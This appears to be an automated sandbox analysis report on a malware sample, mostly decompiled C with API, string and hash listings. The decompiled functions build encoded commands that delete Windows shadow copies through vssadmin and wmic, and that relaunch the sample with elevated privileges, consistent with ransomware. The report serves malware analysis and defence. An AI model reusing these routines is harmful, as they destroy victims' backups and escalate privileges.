				_t544 = _t543 ^  *(0xf4ebe40 + (_t289 >> 0x18) * 4) ^  *(0xf4eba40 + (_t289 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf4eb640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf4eb240 + (_a4 & 0x000000ff) * 4);
				_t562 = _t561 ^ _t544;
				_t554 = _t553 ^ _t562;
				_t422 = _t421 ^ _t554;
				 *(_t297 + 0x30) = _t544;
				 *(_t297 + 0x34) = _t562;
				 *(_t297 + 0x38) = _t554;
				 *(_t297 + 0x3c) = _t422;
				_t306 = _v12 ^  *(0xf4eba40 + (_t422 >> 0x18) * 4) ^  *(0xf4eb640 + (_t422 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf4eb240 + (_t422 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf4ebe40 + (_t422 & 0x000000ff) * 4) ^  *0xf4ea204;
				_v12 = _t306;
				 *(_a8 + 0x40) = _t306;
				_t458 = _v16 ^ _t306;
				_v16 = _t458;
				 *(_a8 + 0x44) = _t458;
				_t309 = _v8 ^ _t458;
				_t459 = _a8;
				_v8 = _t309;
				 *(_t459 + 0x48) = _t309;
				_t311 = _a4 ^ _v8;
				 *(_t459 + 0x4c) = _t311;
				_a4 = _t311;
				_t319 = _a8;
				_t545 = _t544 ^  *(0xf4ebe40 + (_t311 >> 0x18) * 4) ^  *(0xf4eba40 + (_t311 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf4eb640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf4eb240 + (_a4 & 0x000000ff) * 4);
				_t563 = _t562 ^ _t545;
				_t555 = _t554 ^ _t563;
				_t423 = _t422 ^ _t555;
				 *(_t319 + 0x50) = _t545;
				 *(_t319 + 0x54) = _t563;
				 *(_t319 + 0x58) = _t555;
				 *(_t319 + 0x5c) = _t423;
				_t328 = _v12 ^  *(0xf4eba40 + (_t423 >> 0x18) * 4) ^  *(0xf4eb640 + (_t423 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf4eb240 + (_t423 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf4ebe40 + (_t423 & 0x000000ff) * 4) ^  *0xf4ea208;
				_v12 = _t328;
				 *(_a8 + 0x60) = _t328;
				_t475 = _v16 ^ _t328;
				_v16 = _t475;
				 *(_a8 + 0x64) = _t475;
				_t331 = _v8 ^ _t475;
				_t476 = _a8;
				_v8 = _t331;
				 *(_t476 + 0x68) = _t331;
				_t333 = _a4 ^ _v8;
				 *(_t476 + 0x6c) = _t333;
				_a4 = _t333;
				_t341 = _a8;
				_t546 = _t545 ^  *(0xf4ebe40 + (_t333 >> 0x18) * 4) ^  *(0xf4eba40 + (_t333 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf4eb640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf4eb240 + (_a4 & 0x000000ff) * 4);
				_t564 = _t563 ^ _t546;
				_t556 = _t555 ^ _t564;
				_t424 = _t423 ^ _t556;
				 *(_t341 + 0x70) = _t546;
				 *(_t341 + 0x74) = _t564;
				 *(_t341 + 0x78) = _t556;
				 *(_t341 + 0x7c) = _t424;
				_t350 = _v12 ^  *(0xf4eba40 + (_t424 >> 0x18) * 4) ^  *(0xf4eb640 + (_t424 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf4eb240 + (_t424 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf4ebe40 + (_t424 & 0x000000ff) * 4) ^  *0xf4ea20c;
				_v12 = _t350;
				 *(_a8 + 0x80) = _t350;
				_t492 = _v16 ^ _t350;
				_v16 = _t492;
				 *(_a8 + 0x84) = _t492;
				_t353 = _v8 ^ _t492;
				_t493 = _a8;
				_v8 = _t353;
				 *(_t493 + 0x88) = _t353;
				_t355 = _a4 ^ _v8;
				 *(_t493 + 0x8c) = _t355;
				_a4 = _t355;
				_t363 = _a8;
				_t547 = _t546 ^  *(0xf4ebe40 + (_t355 >> 0x18) * 4) ^  *(0xf4eba40 + (_t355 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf4eb640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf4eb240 + (_a4 & 0x000000ff) * 4);
				_t565 = _t564 ^ _t547;
				_t557 = _t556 ^ _t565;
				 *(_t363 + 0x90) = _t547;
				 *(_t363 + 0x94) = _t565;
				 *(_t363 + 0x98) = _t557;
				_t425 = _t424 ^ _t557;
				 *(_t363 + 0x9c) = _t425;
				_t372 = _v12 ^  *(0xf4eba40 + (_t425 >> 0x18) * 4) ^  *(0xf4eb640 + (_t425 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf4eb240 + (_t425 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf4ebe40 + (_t425 & 0x000000ff) * 4) ^  *0xf4ea210;
				_v12 = _t372;
				 *(_a8 + 0xa0) = _t372;
				_t509 = _v16 ^ _t372;
				_v16 = _t509;
				 *(_a8 + 0xa4) = _t509;
				_t375 = _v8 ^ _t509;
				_t510 = _a8;
				_v8 = _t375;
				 *(_t510 + 0xa8) = _t375;
				_t377 = _a4 ^ _v8;
				 *(_t510 + 0xac) = _t377;
				_a4 = _t377;
				_t385 = _a8;
				_t548 = _t547 ^  *(0xf4ebe40 + (_t377 >> 0x18) * 4) ^  *(0xf4eba40 + (_t377 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf4eb640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf4eb240 + (_a4 & 0x000000ff) * 4);
				_t566 = _t565 ^ _t548;
				_t558 = _t557 ^ _t566;
				_t426 = _t425 ^ _t558;
				 *(_t385 + 0xb0) = _t548;
				 *(_t385 + 0xb4) = _t566;
				 *(_t385 + 0xb8) = _t558;
				 *(_t385 + 0xbc) = _t426;
				_t394 = _v12 ^  *(0xf4eba40 + (_t426 >> 0x18) * 4) ^  *(0xf4eb640 + (_t426 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf4eb240 + (_t426 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf4ebe40 + (_t426 & 0x000000ff) * 4) ^  *0xf4ea214;
				_v12 = _t394;
				 *(_a8 + 0xc0) = _t394;
				_t526 = _v16 ^ _t394;
				_v16 = _t526;
				 *(_a8 + 0xc4) = _t526;
				_t397 = _v8 ^ _t526;
				_t527 = _a8;
				_v8 = _t397;
				 *(_t527 + 0xc8) = _t397;
				_t399 = _a4 ^ _v8;
				 *(_t527 + 0xcc) = _t399;
				_a4 = _t399;
				_t407 = _a8;
				_t549 = _t548 ^  *(0xf4ebe40 + (_t399 >> 0x18) * 4) ^  *(0xf4eba40 + (_t399 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf4eb640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf4eb240 + (_a4 & 0x000000ff) * 4);
				_t567 = _t566 ^ _t549;
				_t559 = _t558 ^ _t567;
				_t427 = _t426 ^ _t559;
				 *(_t407 + 0xd4) = _t567;
				_t568 = _t407;
				 *(_t407 + 0xd0) = _t549;
				 *(_t568 + 0xd8) = _t559;
				 *(_t568 + 0xdc) = _t427;
				_t416 = _v12 ^  *(0xf4eba40 + (_t427 >> 0x18) * 4) ^  *(0xf4eb640 + (_t427 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xf4eb240 + (_t427 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xf4ebe40 + (_t427 & 0x000000ff) * 4) ^  *0xf4ea218;
				 *((intOrPtr*)(_t568 + 0xf0)) = 0;
				_t542 = _v16 ^ _t416;
				 *(_t568 + 0xe0) = _t416;
				_t551 = _v8 ^ _t542;
				 *(_t568 + 0xe4) = _t542;
				 *(_t568 + 0xec) = _a4 ^ _t551;
				 *(_t568 + 0xe8) = _t551;
				 *((char*)(_t568 + 0xf0)) = 0xe0;
				return 0;
			}

0x0f4e8526
0x0f4e852a
0x0f4e852e
0x0f4e8530
0x0f4e8533
0x0f4e8535
0x0f4e8538
0x0f4e853b
0x0f4e853e
0x0f4e8541
0x0f4e8544
0x0f4e8547
0x0f4e854a
0x0f4e854d
0x0f4e8550
0x0f4e8553
0x0f4e8556
0x0f4e8559
0x0f4e855d
0x0f4e8560
0x0f4e8563
0x0f4e856e
0x0f4e85a9
0x0f4e85ae
0x0f4e85b1
0x0f4e85b7
0x0f4e85bc
0x0f4e85bf
0x0f4e85c5
0x0f4e85c7
0x0f4e85ca
0x0f4e85cd
0x0f4e85d3
0x0f4e85d6
0x0f4e85db
0x0f4e8612
0x0f4e8615
0x0f4e8617
0x0f4e8619
0x0f4e861b
0x0f4e861d
0x0f4e8620
0x0f4e8623
0x0f4e8626
0x0f4e8666
0x0f4e866b
0x0f4e866e
0x0f4e8674
0x0f4e8679
0x0f4e867c
0x0f4e8682
0x0f4e8684
0x0f4e8687
0x0f4e868a
0x0f4e8690
0x0f4e8693
0x0f4e8698
0x0f4e86cf
0x0f4e86d2
0x0f4e86d4
0x0f4e86d6
0x0f4e86d8
0x0f4e86da
0x0f4e86df
0x0f4e86e2
0x0f4e86e5
0x0f4e8723
0x0f4e8728
0x0f4e872b
0x0f4e8731
0x0f4e8736
0x0f4e8739
0x0f4e873f
0x0f4e8741
0x0f4e8744
0x0f4e8747
0x0f4e874d
0x0f4e8750
0x0f4e8755
0x0f4e878c
0x0f4e878f
0x0f4e8791
0x0f4e8793
0x0f4e8795
0x0f4e8797
0x0f4e879c
0x0f4e879f
0x0f4e87a2
0x0f4e87e0
0x0f4e87e5
0x0f4e87e8
0x0f4e87f1
0x0f4e87f6
0x0f4e87f9
0x0f4e8802
0x0f4e8804
0x0f4e8807
0x0f4e880a
0x0f4e8813
0x0f4e8816
0x0f4e881e
0x0f4e8855
0x0f4e8858
0x0f4e885a
0x0f4e885c
0x0f4e885e
0x0f4e8864
0x0f4e886a
0x0f4e8870
0x0f4e8872
0x0f4e88b5
0x0f4e88ba
0x0f4e88bd
0x0f4e88c6
0x0f4e88cb
0x0f4e88ce
0x0f4e88d7
0x0f4e88d9
0x0f4e88dc
0x0f4e88df
0x0f4e88e8
0x0f4e88eb
0x0f4e88f3
0x0f4e892a
0x0f4e892d
0x0f4e892f
0x0f4e8931
0x0f4e8933
0x0f4e8935
0x0f4e893d
0x0f4e8943
0x0f4e8949
0x0f4e898a
0x0f4e898f
0x0f4e8992
0x0f4e899b
0x0f4e89a0
0x0f4e89a3
0x0f4e89ac
0x0f4e89ae
0x0f4e89b1
0x0f4e89b4
0x0f4e89bd
0x0f4e89c0
0x0f4e89c8
0x0f4e89ff
0x0f4e8a02
0x0f4e8a04
0x0f4e8a06
0x0f4e8a08
0x0f4e8a0a
0x0f4e8a12
0x0f4e8a14
0x0f4e8a25
0x0f4e8a2b
0x0f4e8a65
0x0f4e8a67
0x0f4e8a74
0x0f4e8a76
0x0f4e8a7f
0x0f4e8a83
0x0f4e8a89
0x0f4e8a91
0x0f4e8a97
0x0f4e8aa3

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23eec013fe826aba24ffb5e6f91708e5ab7b9e4918de9e9e03bbd25fee6ec035
Instruction ID: c7c1f1b0d71a4c4f7c9a0e2467c4db6e36fa8a6dc9050fd35638018cbbb3b4d1
Opcode Fuzzy Hash: 23eec013fe826aba24ffb5e6f91708e5ab7b9e4918de9e9e03bbd25fee6ec035
Instruction Fuzzy Hash: 6012DC70A101199FCB48CF6DD4909AABBF1FB8D311B4281AEE94ADF382C735A951DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E5FF0 Relevance: .3, Instructions: 346COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 794c13284e084b999102786f7c7132ff237cb24c9401df5e3aaca089a4b1fbef
Instruction ID: 39c4be4f8618666d6e1abb0d9493ea4f8bde7ca21e39e6343b37994ea7c7977c
Opcode Fuzzy Hash: 794c13284e084b999102786f7c7132ff237cb24c9401df5e3aaca089a4b1fbef
Instruction Fuzzy Hash: 55D18C71E102168FCB24CF58C890BAAB7B1FF68315F6A45AADC55AB342D735F941CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E45B0 Relevance: 78.8, APIs: 5, Strings: 40, Instructions: 99
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F4E45B0(void* __eflags) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				short _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				short* _v176;
				short* _t51;
				WCHAR* _t59;
				void* _t62;
				signed int _t66;
				void* _t69;

				if(E0F4E3CF0(_t62) == 0) {
					_v172 = 0x63005c;
					_v168 = 0x64006d;
					_v8 = 0;
					_t59 =  &_v172;
					_v164 = 0x65002e;
					_t51 =  &_v84;
					_v160 = 0x650078;
					_v156 = 0;
					_v84 = 0x63002f;
					_v80 = 0x760020;
					_v76 = 0x730073;
					_v72 = 0x640061;
					_v68 = 0x69006d;
					_v64 = 0x20006e;
					_v60 = 0x650064;
					_v56 = 0x65006c;
					_v52 = 0x650074;
					_v48 = 0x730020;
					_v44 = 0x610068;
					_v40 = 0x6f0064;
					_v36 = 0x730077;
					_v32 = 0x2f0020;
					_v28 = 0x6c0061;
					_v24 = 0x20006c;
					_v20 = 0x71002f;
					_v16 = 0x690075;
					_v12 = 0x740065;
				} else {
					_v152 = 0x77005c;
					_v148 = 0x650062;
					_t59 =  &_v152;
					_v144 = 0x5c006d;
					_t51 =  &_v120;
					_v140 = 0x6d0077;
					_v136 = 0x630069;
					_v132 = 0x65002e;
					_v128 = 0x650078;
					_v124 = 0;
					_v120 = 0x680073;
					_v116 = 0x640061;
					_v112 = 0x77006f;
					_v108 = 0x6f0063;
					_v104 = 0x790070;
					_v100 = 0x640020;
					_v96 = 0x6c0065;
					_v92 = 0x740065;
					_v88 = 0x65;
				}
				_v176 = _t51;
				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
				if(_t69 != 0) {
					GetSystemDirectoryW(_t69, 0x100);
					lstrcatW(_t69, _t59);
					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
					asm("sbb edi, edi");
					_t66 =  ~0x20;
				} else {
					_t66 = 0;
				}
				VirtualFree(_t69, 0, 0x8000);
				return _t66;
			}

0x0f4e45c6
0x0f4e4662
0x0f4e466c
0x0f4e4674
0x0f4e467c
0x0f4e4680
0x0f4e4688
0x0f4e468c
0x0f4e4694
0x0f4e4699
0x0f4e46a1
0x0f4e46a9
0x0f4e46b1
0x0f4e46b9
0x0f4e46c1
0x0f4e46c9
0x0f4e46d4
0x0f4e46df
0x0f4e46ea
0x0f4e46f5
0x0f4e4700
0x0f4e470b
0x0f4e4716
0x0f4e4721
0x0f4e472c
0x0f4e4737
0x0f4e4742
0x0f4e474d
0x0f4e45cc
0x0f4e45ce
0x0f4e45d6
0x0f4e45de
0x0f4e45e2
0x0f4e45ea
0x0f4e45ee
0x0f4e45f6
0x0f4e45fe
0x0f4e4606
0x0f4e460e
0x0f4e4613
0x0f4e461b
0x0f4e4623
0x0f4e462b
0x0f4e4633
0x0f4e463b
0x0f4e4643
0x0f4e464b
0x0f4e4653
0x0f4e4653
0x0f4e4766
0x0f4e4775
0x0f4e4779
0x0f4e4785
0x0f4e478d
0x0f4e47a3
0x0f4e47ab
0x0f4e47ad
0x0f4e477b
0x0f4e477b
0x0f4e477b
0x0f4e47b7
0x0f4e47c5

APIs

Part of subcall function 0F4E3CF0: _memset.LIBCMT ref: 0F4E3D42
Part of subcall function 0F4E3CF0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F4E3D66
Part of subcall function 0F4E3CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F4E3D6A
Part of subcall function 0F4E3CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F4E3D6E
Part of subcall function 0F4E3CF0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F4E3D95

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 0F4E476F
GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 0F4E4785
lstrcatW.KERNEL32(00000000,0063005C), ref: 0F4E478D
ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 0F4E47A3
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F4E47B7

Strings

t, xrefs: 0F4E46DF
l, xrefs: 0F4E472C
n, xrefs: 0F4E46C1
l, xrefs: 0F4E46D4
, xrefs: 0F4E46A1
w, xrefs: 0F4E470B
\, xrefs: 0F4E4662
e, xrefs: 0F4E4643
, xrefs: 0F4E4716
., xrefs: 0F4E45FE
m, xrefs: 0F4E45E2
p, xrefs: 0F4E4633
m, xrefs: 0F4E46B9
/, xrefs: 0F4E4699
e, xrefs: 0F4E4653
, xrefs: 0F4E46EA
, xrefs: 0F4E463B
c, xrefs: 0F4E462B
e, xrefs: 0F4E464B
s, xrefs: 0F4E4613
open, xrefs: 0F4E479C
a, xrefs: 0F4E461B
b, xrefs: 0F4E45D6
m, xrefs: 0F4E466C
/, xrefs: 0F4E4737
i, xrefs: 0F4E45F6
o, xrefs: 0F4E4623
s, xrefs: 0F4E46A9
x, xrefs: 0F4E468C
h, xrefs: 0F4E46F5
\, xrefs: 0F4E45CE
w, xrefs: 0F4E45EE
., xrefs: 0F4E4680
e, xrefs: 0F4E474D
d, xrefs: 0F4E4700
u, xrefs: 0F4E4742
x, xrefs: 0F4E4606
a, xrefs: 0F4E46B1
d, xrefs: 0F4E46C9
a, xrefs: 0F4E4721

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
API String ID: 2684037697-4098772853
Opcode ID: 0e88ab02c8c6351ac5016b26fb9c26326c944dcaa8470268353d8a1f9d4e522d
Instruction ID: bea901b6c1a3851dbe34f11620091fc5105ec5f38090db62c76620e17ef64548
Opcode Fuzzy Hash: 0e88ab02c8c6351ac5016b26fb9c26326c944dcaa8470268353d8a1f9d4e522d
Instruction Fuzzy Hash: FF4109B0148380DFE320CF119849B5BBFE2BB85B59F10491DEA985A292C7F6854CCF97

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E3DB0 Relevance: 77.1, APIs: 9, Strings: 35, Instructions: 109
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F4E3DB0(void* __ecx, void* __edx, void* __eflags) {
				char _v1020;
				short _v1028;
				char _v1532;
				short _v1540;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				short _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				short _v1676;
				char _v1680;
				int _t54;
				struct HWND__* _t62;
				long _t66;
				void* _t76;
				void* _t78;
				void* _t80;

				_t78 = __ecx;
				_t54 = E0F4E3CF0(__edx);
				if(_t54 != 0) {
					_t54 = E0F4E3C70();
					if(_t54 == 0) {
						_v1676 = 0x770025;
						_v1672 = 0x6e0069;
						_v1668 = 0x690064;
						_v1664 = 0x250072;
						_v1660 = 0x73005c;
						_v1656 = 0x730079;
						_v1652 = 0x650074;
						_v1648 = 0x33006d;
						_v1644 = 0x5c0032;
						_v1640 = 0x620077;
						_v1636 = 0x6d0065;
						_v1632 = 0x77005c;
						_v1628 = 0x69006d;
						_v1624 = 0x63;
						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
						_v1620 = 0x720070;
						_v1616 = 0x63006f;
						_v1612 = 0x730065;
						_v1608 = 0x200073;
						_v1604 = 0x610063;
						_v1600 = 0x6c006c;
						_v1596 = 0x630020;
						_v1592 = 0x650072;
						_v1588 = 0x740061;
						_v1584 = 0x200065;
						_v1580 = 0x630022;
						_v1576 = 0x64006d;
						_v1572 = 0x2f0020;
						_v1568 = 0x200063;
						_v1564 = 0x740073;
						_v1560 = 0x720061;
						_v1556 = 0x200074;
						_v1552 = 0x730025;
						_v1548 = 0x22;
						wsprintfW( &_v1028,  &_v1620, _t78);
						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
						 *_t76 = 0x3c;
						 *(_t76 + 4) = 0x40;
						_t62 = GetForegroundWindow();
						_t80 = 0;
						 *(_t76 + 8) = _t62;
						_v1680 = 0x750072;
						_v1676 = 0x61006e;
						_v1672 = 0x73;
						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
						 *(_t76 + 0x18) = 0;
						 *(_t76 + 0x1c) = 0;
						 *(_t76 + 0x20) = 0;
						while(1) {
							_t66 = ShellExecuteExW(_t76);
							if(_t66 != 0) {
								break;
							}
							_t80 = _t80 + 1;
							if(_t80 < 0x64) {
								continue;
							}
							_t54 = VirtualFree(_t76, _t66, 0x8000);
							goto L6;
						}
						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
						CloseHandle( *(_t76 + 0x38));
						ExitProcess(0);
					}
				}
				L6:
				return _t54;
			}

0x0f4e3dbf
0x0f4e3dc1
0x0f4e3dc8
0x0f4e3dce
0x0f4e3dd5
0x0f4e3de7
0x0f4e3df4
0x0f4e3dfd
0x0f4e3e05
0x0f4e3e0d
0x0f4e3e15
0x0f4e3e1d
0x0f4e3e25
0x0f4e3e2d
0x0f4e3e35
0x0f4e3e3d
0x0f4e3e45
0x0f4e3e4d
0x0f4e3e55
0x0f4e3e5d
0x0f4e3e68
0x0f4e3e78
0x0f4e3e81
0x0f4e3e89
0x0f4e3e91
0x0f4e3e99
0x0f4e3ea1
0x0f4e3ea9
0x0f4e3eb1
0x0f4e3eb9
0x0f4e3ec4
0x0f4e3ecf
0x0f4e3eda
0x0f4e3ee5
0x0f4e3ef0
0x0f4e3efb
0x0f4e3f06
0x0f4e3f11
0x0f4e3f1c
0x0f4e3f27
0x0f4e3f41
0x0f4e3f43
0x0f4e3f49
0x0f4e3f50
0x0f4e3f5c
0x0f4e3f5e
0x0f4e3f65
0x0f4e3f6d
0x0f4e3f75
0x0f4e3f7d
0x0f4e3f87
0x0f4e3f91
0x0f4e3f94
0x0f4e3f9b
0x0f4e3fa2
0x0f4e3fb0
0x0f4e3fb1
0x0f4e3fb5
0x00000000
0x00000000
0x0f4e3fb7
0x0f4e3fbb
0x00000000
0x00000000
0x0f4e3fc4
0x00000000
0x0f4e3fc4
0x0f4e3fd6
0x0f4e3fdf
0x0f4e3fe7
0x0f4e3fe7
0x0f4e3dd5
0x0f4e3fca
0x0f4e3fd0

APIs

Part of subcall function 0F4E3CF0: _memset.LIBCMT ref: 0F4E3D42
Part of subcall function 0F4E3CF0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F4E3D66
Part of subcall function 0F4E3CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F4E3D6A
Part of subcall function 0F4E3CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F4E3D6E
Part of subcall function 0F4E3CF0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F4E3D95

Part of subcall function 0F4E3C70: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F4E3CA0

ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0F4E3E5D
wsprintfW.USER32 ref: 0F4E3F27
VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 0F4E3F3B
GetForegroundWindow.USER32 ref: 0F4E3F50
ShellExecuteExW.SHELL32(00000000), ref: 0F4E3FB1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F4E3FC4
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0F4E3FD6
CloseHandle.KERNEL32(?), ref: 0F4E3FDF
ExitProcess.KERNEL32 ref: 0F4E3FE7

Strings

s, xrefs: 0F4E3E89
2, xrefs: 0F4E3E2D
%, xrefs: 0F4E3DE7
w, xrefs: 0F4E3E35
", xrefs: 0F4E3F1C
l, xrefs: 0F4E3E99
c, xrefs: 0F4E3EE5
o, xrefs: 0F4E3E78
a, xrefs: 0F4E3EFB
i, xrefs: 0F4E3DF4
", xrefs: 0F4E3EC4
e, xrefs: 0F4E3EB9
p, xrefs: 0F4E3E68
c, xrefs: 0F4E3E91
n, xrefs: 0F4E3F6D
d, xrefs: 0F4E3DFD
t, xrefs: 0F4E3E1D
r, xrefs: 0F4E3F65
t, xrefs: 0F4E3F06
, xrefs: 0F4E3EA1
\, xrefs: 0F4E3E45
y, xrefs: 0F4E3E15
m, xrefs: 0F4E3E25
e, xrefs: 0F4E3E3D
r, xrefs: 0F4E3EA9
r, xrefs: 0F4E3E05
a, xrefs: 0F4E3EB1
s, xrefs: 0F4E3F75
%, xrefs: 0F4E3F11
e, xrefs: 0F4E3E81
\, xrefs: 0F4E3E0D
m, xrefs: 0F4E3ECF
s, xrefs: 0F4E3EF0
c, xrefs: 0F4E3E55
, xrefs: 0F4E3EDA

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
